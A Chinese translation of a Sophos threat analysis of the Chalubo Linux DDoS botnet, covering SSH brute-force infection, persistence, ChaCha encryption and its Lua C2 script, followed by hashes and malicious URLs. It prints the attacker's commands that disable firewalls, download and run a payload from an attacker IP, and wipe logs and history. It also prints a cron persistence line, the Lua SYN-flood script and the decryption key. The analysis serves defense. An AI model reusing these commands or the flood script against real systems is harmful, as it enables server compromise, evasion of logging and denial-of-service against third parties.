本文为翻译稿件，原文为：https://news.sophos.com/en-us/2018/10/22/chalubo-botnet-wants-to-ddos-from-your-server-or-iot-device/

暴力使用SSH攻击的攻击者已经开始部署新一轮的协同式DDos攻击。

自9月初以来，将目标瞄准SSH服务器的Linux系统上的攻击被SophosLabs持续的进行关注。根据其发现，这些攻击已经放弃了我们称之为Chalubo的最新拒绝服务自动化攻击系列工具。

攻击者使用ChaCha流密码加密主应用组件及其相应的Lua脚本。 这种逆向技术的采用帮助我们分析出来了Linux恶意软件的发展历程，然而作者已经采用了更常见的Windows恶意软件原理以阻止检测的实施。 与其前身一样，Chalubo整合了Xor.DDoS和Mirai恶意软件系列的代码。

Chalubo下载器于8月下旬开始在网络中流传。黑客在受害者的设备上发出命令以检索其软件，该恶意软件实际上由三部分组成：下载器;、主bot程序（仅在具有x86处理器架构的系统上运行）和Lua命令脚本。 截至10月中旬，攻击者持续的发出检索Elknot dropper（检测为Linux / DDoS-AZ）的命令，后者又提供Chalubo（ChaCha-Lua-bot）软件包的其余部分代码。

此外，我们现在可以看到在不同处理器架构上运行的各种bot版本程序，包括32位和64位的ARM，x86，x86_64，MIPS，MIPSEL和PowerPC。
这些现象表明测试期结束，之后我们可能会看到有关攻击活动数量会持续增加。

具体攻击

SophosLabs发现Chalubo系列是一种攻击蜜罐，我们用它来收集有关恶意活动的数据。 我们在2018年9月6日记录了相关攻击，机器人尝试对SSH服务器强制登录凭据; 我们的蜜罐为攻击者提供了一个真正的shell外观，此shell可以保存各种攻击步骤。 攻击者使用root：admin的组合获得一个shell ......至少来说，这是他们的一些想法。

一旦攻击者“访问”蜜罐服务器，他们就会发出以下命令。

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c

这些蜜罐里所呈现的简单攻击都十分常见，但是这里突出的是libsdes相关样本。与我们常见的标准Linux的bots攻击相比，这个应用更具有复杂性。攻击者不仅使用了分层方法来删除恶意组件，而且使用的加密不是我们Linux里常见的加密类型。

另外，在9月底，同一攻击者集群再次袭击了我们的蜜罐系统。我们在蜜罐中找到了一些呦Elknot开发的BillGates恶意软件系列[Linux / DDoS-BD]。 恶意样本来自地址hxxp://117.21.191.108:8269 / start。

下载器

首次执行时，libsdes示例为了防止恶意软件的多次出现，会创建一个空文件/tmp/tmp.l。 然后应用尝试将自身复制到/ usr / bin /目录下，并产生一个随机的字母数字字符串作为文件名。 有趣的是，它似乎从Mirai僵尸网络中复制了rand_alphastr函数。

此时，代码将会分叉。 父进程会设置多个持久性攻击点，以便恶意软件能够定期执行代码并可以在重新启动后继续存在。 它通过向/etc/init.d/ <rand_alphastr>添加一个传统的init.d脚本来实现这一点，该脚本符号链接到/ etc / rc [1..5] .d / S90 <rand_alphastr>或/etc/rc.d/ RC[1..5].D/S90<rand_alphastr>。</rand_alphastr>

非常有趣的是，它还删除了一个带可识别路径的脚本文件（/etc/cron.hourly/gcc4.sh），该路径被添加到/ etc / crontab并通过命令每3分钟运行一次：

sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' >> /etc/crontab

这些脚本如下所示：

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
cp /lib/libudev4.so /lib/libudev4.so.6
/lib/libudev4.so.6

这些脚本设计的非常巧妙，因为它引用了曾经Xor.DDoS恶意软件的文件脚本（Sophos检测为Linux / DDoS-BH）。此脚本删除的方式与Xor.DDoS系列完全匹配。事实上，如果仔细查看负责持久攻击部分的代码的话，Chalubo已经从Xor.DDoS系列中复制了DelService和AddService函数。

除了这些功能之外，代码结束的地方还有一些小的相似之处。 很显然，Chalubo的作者访问Xor.DDoS的源代码，但它们绝不属于同一个类型。

子进程的第一个操作是将其进程名称修改为crond或[kworker / 1：1]，然后下载、解密、解压缩并运行下一个ELF二进制的payload。 之后检查修改过的HTTP响应头以确定是否应下载此payload，我们记录的攻击显示样本自2018年8月27日星期一09:57:30 GMT后便已经存在，并且是从hxxp:// q111333下载的。 顶部：8852 / pc / i486它被送入ChaCha解密程序。 在解密之后，使用LZMA对有效载荷进行解压缩，然后由execve执行，并使用修改的进程名称作为参数。

加密部分

Chalubo使用流密码ChaCha进行加密，并设置轮书为20轮。 在原始算法中，我们希望ChaCha使用16或32字节的密钥和8字节nonce。 这些数用于设置加密初始化以及一个初始化的16字节常量。是否扩展16字节k或扩展32字节k，具体取决于密钥大小以及一个8字节计数器。如果密钥是16字节，则第二次需要使用它来填充初始密钥状态空间的32个字节。

但是，鉴于对等原则。有一个修改过的版本使用了带有4字节计数器的12字节随机数，而不是带有8字节计数器与原始8字节随机数。这也被称为chacha-ietf。

Chalubo中的ChaCha-IETF在实现功能时将4字节计数器做单独的参数。

Chalubo实现初始化计数器是从一而不是零开始。 上面提到的具有对等原则的RFC实际上表明：“对于第一个随机数nonce，计数器部分应该等于零。对于生成的每个连续的nonce，我们需要增加1。 但是为了方便，我们可以跳过任何特定的计数器值，并将其排除在所使用的值序列之外。”因此，尽管这个算法比较独特，但它可以被视为标准来实现。

通过各种实现方式，似乎每个人都有自己对counter和nonce字段的看法。 大多数都认为不应该设置计数器，因此硬编码应该从零开始。 其他一些例子，如Linux内核中的加密API将计数器和随机数的最后16个字节视为单个输入参数，但是Libsodium库是使用ChaCha-IETF实现，并且其中用计数器作为单独的参数。即便如此， 参数的顺序与我们在Chalubo中看到的并不完全一致。

例如，下面是Libsodium函数：

int crypto_stream_chacha20_ietf_xor_ic(unsigned char *c, const unsigned char *m,
                                       unsigned long long mlen,
                                       const unsigned char *n, uint32_t ic,
                                       const unsigned char *k);

这与Chalubo中的功能相同（如果我们重命名一些变量以用于匹配上述例子中的变量）：

int crypto_stream_chacha20_ietf_xor_ic(const unsigned char *k, uint32_t ic,
                                       const unsigned char *n,
                                       const unsigned char *m, unsigned char *c,
                                       unsigned long long mlen);

所以我们可以说Chalubo ChaCha函数使用了一个独特的实现方法，其算法与peer / IETF相匹配。

下面是下载器中的ChaCha秘钥：

fa 40 88 55 30 4c a1 99 f6 80 b4 94 b6 9e f4 73 dd 9c 5a 5e 0e 78 ba a4 44 04 8b 82 a8 bd 97 a9

这是下载器和应用中使用的ChaCha随机数：

00 00 00 00 00 00 00 4a 00 00 00 01

应用详情

很明显，一旦我们查看应用的详情，我们会发现Chalubo已经从Mirai复制了一些代码片段，例如一些随机函数和util_local_addr函数的扩展代码。

这个应用中的大部分功能代码都是全新的并且专注于他们自己的Lua处理。而他们的攻击手段主要是用DNS，UDP和SYN风格执行DoS攻击。

内置于应用中的Lua脚本是一个基本控制脚本。它用于调用C2服务器的主页以通知C2有关受感染机器的详细信息。 与下载程序阶段类似，它将检查最后修改的HTTP响应标头，并以从hxxp://q111333.top:8852 / test / res.dat中检索另一个Lua脚本形式的下载任务列表。 此C2命令脚本也使用ChaCha-IETF算法加密，因此Lua脚本会调用函数task_decrypt。 它使用与下载程序相同的随机数nonce，但命令脚本的key值是不同的。

它还通过执行ddos_attack功能“分离”出某些IP地址，这也帮助它进一步了解C2的基础结构。

tcp = require "tcp".create()
local_ip = tcp:get_local_ip()
strip = inet_ntoa(local_ip)

function ddos_attack(ip,port,isemuip,appendstr)
    [[
    tcp = require "tcp".create()
        local_ip = tcp:get_local_ip()
        local_ip_h24 = htonl(local_ip) & 0xffffff00
    ]]

    if isemuip == false then
        script = script.. [[
        tcp:set_ip_src(local_ip)
        ]]
    end

    script = script .. [[
if VERSION > 19 then
        if local_ip_h24 == 0x17f70200 then
            tcp:add_src_ip_range("183.131.206.0","183.131.206.255")
        end
end

    ]]
    appendlen = tonumber(appendstr)
    if appendlen ~= nil and appendlen ~= 0 then
        script = script.. [[
            data = random(appendlen)
            tcp:set_append_data(data)
        ]]
    end
    script = script .. "port = htons(" .. port .. ")\n"

    script = script .. [[
    while true do
       tcp:attack_syn("]] .. ip .. [[",port,0xffffff)
    end
    ]]
    local num = get_nprocs()
    for i=1,num do
        create_task(script)
    end
end

set_speed_limit(1024*1024*200)
if strip==strip and strip~="111.19.140.91" and strip~="113.106.124.77" and strip~="111.19.140.95" and strip~="112.6.40.19" and strip~="183.6.105.42"  then
    ddos_attack("59.56.76.41",10100,false,"0")
end
require "socket".sleep(30)
kill_all_task()

由于此应用感染系统的主要方法是通过对SSH服务器使用通用用户名和密码组合暴力破解，因此我们建议SSH服务器的系统管理员（包括嵌入式设备）更改这些设备上的默认密码。因为暴力循环通常会通过常见的默认密码进行。 如果可能的话，管理员要最好使用SSH密钥而不是登录密码。 与任何机器一样，请确保系统的更新！

在其网络上搜索具有攻击性质的代码可以查找通过8852 / tcp的出站流量。但这唯一的端口号可能会被随时更改，并且无法提供用于我们观察到的C2流量。

Sophos端点和服务器将此系列应用检测为Linux / Chalubo- *。

IOCs

下载器（Downloaders）

5270efedbd96a80213e1480c085a18b336162e399b9af58f21403869f61b4115
0006a8dfc7bb8d07c233b66fd54aff8b2f9c10cd2ef518e2541f7b81ae5650bb
19ef212c4f3406b6aca1c2ce11619443e33ac64aa9688cba64671d3679b73221
3c6e73617240ac030497ddeed2af22c7a6748a3c94f65f23dd2306c2baf0b361
4bf84c6029efd627f3936c1b665df8eca7459a92431caa3ab6a8784ed0ccc7b1
633fdd61e7adb075994668f0968dfd435554ad56a1901ac38ab0b6f3e4612cc2
adeee7742aff95dd04ec4458e4beb2c426b70c73f3dc84439fb13a32cee6c68f
b291f2fca5d772d2ac33cb15d499751c26f10fd2f4f984d987f6711bea5a3b37
b2a2a3a9c99f45096ee4b08be3f8f0a17cfed33e8384052bb332ee4941fab9a5
b2c5518000921f3f6bd6b800b89ceb51d37359f83dbff2ca120e0cc9bfe52b9e
b5cf22e4fdecf5ee437b724f5b0cf09d31fd4c4e3829e29641caf4beb48b079b
bc15d0c22ae33465433814f0ac8a43a51df4cab45fb29577f8fb4fb52e458034
bf493a12e3025b3b7297abba9fa674b2b034f02521cc9e7fb3ec389345257928
c62761e2cccb459f09cc648619817cf5521ad1dcedc6e761ef57a36a79b74949
d0d9d309f629962d8df67c3e236f37afb1d96c354ad6370b2bb096a7feb34abd
fabb0acd338753da162381df4d72ed509f6737e296fc843c71bd57ca805b6c26
3d9614707380f15ac746b1abaaca2396038e1ab6f561f1a6ca23911262b1298f
57078d489642e8b6e434a7b74a4393ef1178e5e2e17606807a759e8a42db6115
9bdd47f2f4a9b3f83ba676cc3a31549028277c8fe0021f52d687a8d767b6d0be

应用（Bots）

050b2486b8a60ca4adc00894bbea30b9860f10e2b1c3f301eab2c1d2ec9157c2
12eb7ce6a8edf76bb16d45f1a8332f8edd0cbe4382924a226d9826d356a6f011
167bf28047bbea17c151877fb7c483856f3f7ec91d88c47d5a4c2e695d2c3599
2180cbd7acf57b817049ba758d0bdd712a27019aec5d1e33a122fc6aef9c128c
31b13d98ee7adaff88f1c7ff756178dcd6109a06ba7e03a78ebca30075cc2414
366ae87be55376762a7f5c4dc09ea0a924678036e9fb6eff55eb981bd2c5b654
38163a58062a50df4bcc55bb2481679e5c7f0e6ca912cb49acf7aa9f494d9a66
42744e48fa266420e6bfd47fb649e8bb85ccc383b8f574ab997560f7bda73e8e
428b0ab1ccd235782b4876cbf6e750ddc0b3a8329c3ef0073879fb16f7323981
4389331bce42f75645a3ff5a6c22025f3f4dde69541ad427a3e2ec20e71d476d
4560736123c7ce020454d9212a713c3a60dbd8a42cf103028e8aa9a399995ab3
4cab17dbf7e6907bc88a047f6f30ba7e8ed9caa59976dd163b950a512e53f164
4cd5d3013bcbd1b63a532b34b40267950dd182f3c8ae8930e64d680db8990018
51d47508bcf868acb4f7fac6dd7029ebe18a1d50850fc78c88aef7dc4d13048f
5486da1345850f9074802c1f68833bfa63835aadd7fe649f8f424e359846438f
5e140063e5eb99c2c89afa37b5e51158314a73b27cbaee05464bac62999b365e
60808c9f354c1a4d45f0e68e682153acdf3e9bc1f6d81a7eec2f6ae96c34d2cb
61ffbbae2a81c975ee861e1c35a0c196a5cfc9260fed8e26ac5a23482e3b2a17
63b69658481e12f6d4fd62030488df9d8fdcb43d23b55722fe2e00e516cd824d
66e61a349ae0adb99c12518acc198b1ee5a5e4876f095a2334944fd130a2b819
7544af740fbec9ed1361741290c996a403d4a50da51ea377cace7fd9bbb42fe0
828342f7650ebe6a1428ab95f0c1915422018db647fb323182ead2efe5075118
8427dc62a3f26d68c69c9d4d2b08b23e72b00d1cedd40712b840f911dfc024ff
853831374573a1a3d12d761255a9a9c507d604fb32bc5459120bf997820a3019
90c7789444442b1d660c85bf6aedeb78d5a8448cb15f9c8b1e946e24a7a2ced1
96e18d82b297a67d0d52a4473b05fd0cd17c77afde907cd5310902e0aa2b8d84
9dcfec996d01c0483e929d9457917debdb2328f2f7d3012ba9684cc0fe9d66f9
a1fcbcbeaf048427204b31c70a2b4165d0ab1bb666d7dd5599c6a608326ae678
a6296e28c9c7b9c3038cc365b56ca89d1f9502b8c1acb5ae579115a1d86561ef
a681c28db1da8293a950eed939b3737fdc0e74cf9ff44f395397dc47fc96ea31
a8180b7490570a33b7d2e787a9df4c18548a2c4526e5561e93e649d66bd0538c
ad69dca845061b856fe25fb98a1a78829351a10a8c2a1b38328451f580272154
af3e9025fe6975b32a00fcce81d52beae3e2bb8743c6133cc51d9559eee30c4b
b97ad854ecdb7eb3560a2e179330ca000e8995be6eff8b88d6041c7b19e8dac2
b9d31125782ca0f20162b9f86b034a34cdc6b3fe318ee990721dc7d7dae66d22
c3568cd4eaf785d5f5b7cd5d493a0b3923b2a29c2d82c803ecbf93f45b913f87
c56263d5efb6738c301ef8b50e60765e8a838332eb72c7924f440fe66945c91c
caf943fe8a5737ad6beb729b367dace51126a578da872bd2e510dd0508ffb80c
cb68e26cdaf03d2fba8e58e8b928019a8783ed44b88633c853b3774672784b85
ce68c3687aae08b796e3e57d97d4f333991b6eba804581ae66f46dbd6ec7dae7
d0ccbef7c4429302ec1b6d83f718f855ae1049f05d5d6ce8bcca535ab45c2b57
d493f68665d7c62b86c2435c741c45772d2f553e183d7a6821d968f5aca309e3
d5efcd1b98c39f2d157c62bc7d96b0472742d06b7a118bac933f448d757304f1
dd240119627cb770aca30d2e4021b6a67c90f6a457cc00991b572a8acad43ffc
e6d2960adbb3a104079f3e7eaa68143304f2064b687fdb190fe98090bb405a25
e7568b13ed9f5a18d0d89bccae185c6c2550a9224b9e97bb0496c7546b68600b
ed44898c666b154111bcbe8d4940aebdaed09d735445f3cc85f2d6e29a850f23
f35be9f432322555f682c13465b3428bc364b96fc02e4e7ac98fa49f20a1f1e8
f6503a9717614a9f4bf5db88bb912bc43462ede1a9627f4ba5c544f644f4ad31
fba737436bdbf1461b3092b79fea0770302aeaed79389eb60b5c45c3bfc9f693
fddeddae2bf1d0759d914bced1bd678a2191152c580f6ce86f87b0674b80bf8b

C2 脚本（C2 script）

799400b6419b91fe8810456d9b32d124dfaad2c5626a07405f5a099679de29b5

Elknot dropper

8fbd768368019df9a3bd05cfc83b3f00933440a8dadc88fe6d2af8a683b089b5

下载器URL地址（Downloader URL）

hxxp://117.21.191.108:8694/libsdes

应用地址（Bot payload URLs）

hxxp://sq520.f3322.net:8852/pc/i486
hxxp://linwudi.f3322.net:8852/pc/i486
hxxp://198.44.164.30:8852/pc/i486
hxxp://uctkone.com:8852/pc/i486
hxxp://hackucdt.com:8852/pc/i486
hxxp://q111333.top:8852/pc/i486
hxxp://103.51.13.52:8852/pc/i486
hxxp://38.27.102.254:8852/pc/i486
hxxp://58.221.55.141:8852/pc/i486
hxxp://mnbvcxzzz12.com:8852/RTEGF/i486
hxxp://mnbvcxzzz12.com:8852/RTEGF/arm
hxxp://mnbvcxzzz12.com:8852/RTEGF/mips
hxxp://mnbvcxzzz12.com:8852/RTEGF/mips64
hxxp://mnbvcxzzz12.com:8852/RTEGF/mipsel
hxxp://mnbvcxzzz12.com:8852/RTEGF/powerpc
hxxp://mnbvcxzzz12.com:8852/RTEGF/x86_64
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/i486
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/arm
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/mips
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/mips64
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/mipsel
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/powerpc
hxxp://lkjhgfdsatryuio.com:8852/RTEGF/x86_64
hxxp://193.201.224.238:8852/GHJFFGND/i486
hxxp://193.201.224.238:8852/GHJFFGND/arm
hxxp://193.201.224.238:8852/GHJFFGND/mips
hxxp://193.201.224.238:8852/GHJFFGND/mips64
hxxp://193.201.224.238:8852/GHJFFGND/mipsel
hxxp://193.201.224.238:8852/GHJFFGND/powerpc
hxxp://193.201.224.238:8852/GHJFFGND/x86_64
hxxp://193.201.224.238:8852/RTEGFN01/arm
hxxp://193.201.224.238:8852/RTEGFN01/i486
hxxp://193.201.224.238:8852/RTEGFN01/mips
hxxp://193.201.224.238:8852/RTEGFN01/mips64
hxxp://193.201.224.238:8852/RTEGFN01/mipsel
hxxp://193.201.224.238:8852/RTEGFN01/powerpc
hxxp://193.201.224.238:8852/RTEGFN01/x86_64
hxxp://193.201.224.238:8852/DAAADF/mips-linux
hxxp://193.201.224.202:8852/ASDFRE/arm
hxxp://193.201.224.202:8852/ASDFRE/i486
hxxp://193.201.224.202:8852/ASDFRE/mips
hxxp://193.201.224.202:8852/ASDFRE/mips64
hxxp://193.201.224.202:8852/ASDFRE/mipsel
hxxp://193.201.224.202:8852/ASDFRE/powerpc
hxxp://193.201.224.202:8852/ASDFRE/x86_64
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/arm
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/i486
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/mips
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/mips64
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/mipsel
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/powerpc
hxxp://10afdmasaxsssaqrk.com:8852/YTRFDA/x86_64
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/arm
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/i486
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/mips
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/mips64
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/mipsel
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/powerpc
hxxp://7mfsdfasdmkgmrk.com:8852/JHKDSAG/x86_64
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/arm
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/i486
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/mips
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/mips64
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/mipsel
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/powerpc
hxxp://8masaxsssaqrk.com:8852/JHKDSAG/x86_64
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/arm
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/i486
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/mips
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/mips64
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/mipsel
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/powerpc
hxxp://9fdmasaxsssaqrk.com:8852/YTRFDA/x86_64
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/arm
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/i486
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/mips
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/mips64
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/mipsel
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/powerpc
hxxp://efbthmoiuykmkjkjgt.com:8852/RTEGFN01/x86_64
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/arm
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/i486
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/mips
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/mips64
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/mipsel
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/powerpc
hxxp://poiuytyuiopkjfnf.com:8852/ASDFRE/x86_64
hxxp://rfjejnfjnefje.com:8852/ASDFRE/arm
hxxp://rfjejnfjnefje.com:8852/ASDFRE/i486
hxxp://rfjejnfjnefje.com:8852/ASDFRE/mips
hxxp://rfjejnfjnefje.com:8852/ASDFRE/mips64
hxxp://rfjejnfjnefje.com:8852/ASDFRE/mipsel
hxxp://rfjejnfjnefje.com:8852/ASDFRE/powerpc
hxxp://rfjejnfjnefje.com:8852/ASDFRE/x86_64
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/arm
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/i486
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/mips
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/mips64
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/mipsel
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/powerpc
hxxp://zxcvbmnnfjjfwq.com:8852/RTEGFN01/x86_64
hxxp://marchdom4.com/mikrotik/arm

C2地址（C2 URI）

hxxp://q111333.top:8852/test/res.dat
hxxp://hackucdt.com:8852/test/res.dat
hxxp://103.51.13.52:8852/test/res.dat
hxxp://193.201.224.202:8852/ASDFRE/ASDFRE.dat
hxxp://193.201.224.238:8852/GHJFFGND/GHJFFGND.dat
hxxp://193.201.224.238:8852/RTEGFN01/RTEGFN01.dat
hxxp://193.201.224.239:8852/ASDFRE/ASDFRE.dat
hxxp://193.201.224.239:8852/JHKDSAG/JHKDSAG.dat
hxxp://193.201.224.239:8852/RTEGF/RTEGF.dat
hxxp://193.201.224.239:8852/YTRFDA/YTRFDA.dat